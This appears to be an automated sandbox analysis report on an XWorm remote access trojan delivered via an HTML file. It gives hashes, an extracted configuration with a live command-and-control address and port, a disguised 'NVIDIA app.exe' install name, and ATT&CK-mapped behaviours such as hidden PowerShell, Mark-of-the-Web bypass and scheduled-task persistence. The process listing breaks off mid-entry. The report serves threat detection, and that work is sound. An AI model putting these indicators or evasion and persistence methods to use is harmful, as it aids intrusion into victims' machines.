xworm | 4c6183029dcf2e4d604c473c2dfb4f72037b6a8f13d9183b0842fd201e422d7a

Analysis

max time kernel
427s
max time network
428s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
05/03/2025, 16:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0hxASt.html
Size

7KB
MD5

aa5d13590623abb5d3963a8af5dfb85d
SHA1

8dcb62e75f970ac4f9f78e2558f335951b599774
SHA256

4c6183029dcf2e4d604c473c2dfb4f72037b6a8f13d9183b0842fd201e422d7a
SHA512

94899bfebc29d4d76c1a8d0e9b787ae50386a5e8718194791d27d86eb7e67e1b0e1a9b0a4e68031905c767419bd767b9d2666ac5ffd0a8dd87c0bf842ac7282b
SSDEEP

96:CMq9SlLh2B3Zq36uWl/PtxyjttJQ8Maoah3vL5LaNclmnU1Eh2sS:T1lLhwJrPahtJxMaoah3vG12sS

Score

10^/10

xworm defense_evasion discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

181.214.214.6:30120

Mutex

z5dRlxK0ktwBzYfm

Attributes

Install_directory
%ProgramData%
install_file
NVIDIA app.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001b00000002afa2-713.dat	family_xworm
behavioral1/memory/2276-720-0x0000000000660000-0x0000000000670000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
540	powershell.exe
1612	powershell.exe
3452	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
38	3328	msedge.exe

Executes dropped EXE 6 IoCs

pid	Process
1220	winrar-x64-710.exe
5112	winrar-x64-710.exe
2276	2v1.exe
2376	2v1.exe
4416	NVIDIA app.exe
5400	NVIDIA app.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\winrar-x64-710.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Winword.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	Winword.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings	powershell.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\winrar-x64-710.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\example.download:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\example.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\crashfiveguard (2).rar:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 138879.crdownload:SmartScreen	msedge.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
3984	NOTEPAD.EXE
1264	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3892	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 4 IoCs

pid	Process
4852	Winword.exe
4852	Winword.exe
3332	WINWORD.EXE
3332	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
3328	msedge.exe
3328	msedge.exe
5092	msedge.exe
5092	msedge.exe
4932	identity_helper.exe
4932	identity_helper.exe
684	msedge.exe
684	msedge.exe
3592	msedge.exe
3592	msedge.exe
1560	msedge.exe
1560	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2368	msedge.exe
2532	msedge.exe
2532	msedge.exe
1724	msedge.exe
1724	msedge.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
1612	powershell.exe
1612	powershell.exe
1612	powershell.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1120	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 35 IoCs

pid	Process
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	540	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	2276	2v1.exe
Token: SeDebugPrivilege	2276	2v1.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	2376	2v1.exe
Token: SeDebugPrivilege	4416	NVIDIA app.exe
Token: SeBackupPrivilege	5340	svchost.exe
Token: SeRestorePrivilege	5340	svchost.exe
Token: SeSecurityPrivilege	5340	svchost.exe
Token: SeTakeOwnershipPrivilege	5340	svchost.exe
Token: 35	5340	svchost.exe
Token: SeDebugPrivilege	5400	NVIDIA app.exe
Token: SeShutdownPrivilege	5632	shutdown.exe
Token: SeRemoteShutdownPrivilege	5632	shutdown.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe
5092	msedge.exe

Suspicious use of SetWindowsHookEx 43 IoCs

pid	Process
1220	winrar-x64-710.exe
1220	winrar-x64-710.exe
1220	winrar-x64-710.exe
5112	winrar-x64-710.exe
5112	winrar-x64-710.exe
5112	winrar-x64-710.exe
1120	OpenWith.exe
1120	OpenWith.exe
1120	OpenWith.exe
1120	OpenWith.exe
1120	OpenWith.exe
1120	OpenWith.exe
1120	OpenWith.exe
1120	OpenWith.exe
1120	OpenWith.exe
1120	OpenWith.exe
1120	OpenWith.exe
1120	OpenWith.exe
1120	OpenWith.exe
4852	Winword.exe
4852	Winword.exe
4852	Winword.exe
4852	Winword.exe
4852	Winword.exe
4852	Winword.exe
4852	Winword.exe
4852	Winword.exe
4852	Winword.exe
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
3332	WINWORD.EXE
5716	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5092 wrote to memory of 3848	5092	msedge.exe	81
PID 5092 wrote to memory of 3848	5092	msedge.exe	81
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 4312	5092	msedge.exe	82
PID 5092 wrote to memory of 3328	5092	msedge.exe	83
PID 5092 wrote to memory of 3328	5092	msedge.exe	83
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84
PID 5092 wrote to memory of 1504	5092	msedge.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\0hxASt.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9dcfc3cb8,0x7ff9dcfc3cc8,0x7ff9dcfc3cd8
  2⤵
  PID:3848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:4312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  - Suspicious behavior: EnumeratesProcesses
  PID:3328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
  2⤵
  PID:1504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:1180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
  2⤵
  PID:980
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
  2⤵
  PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
  2⤵
  PID:5088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
  2⤵
  PID:3452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
  2⤵
  PID:4684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
  2⤵
  PID:3924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
  2⤵
  PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
  2⤵
  PID:1820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
  2⤵
  PID:4232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
  2⤵
  PID:108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6388 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
  2⤵
  PID:4516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
  2⤵
  PID:2196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6676 /prefetch:1
  2⤵
  PID:568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1
  2⤵
  PID:4540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4193740191405100163,4821443476075278548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:1
  2⤵
  PID:2832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
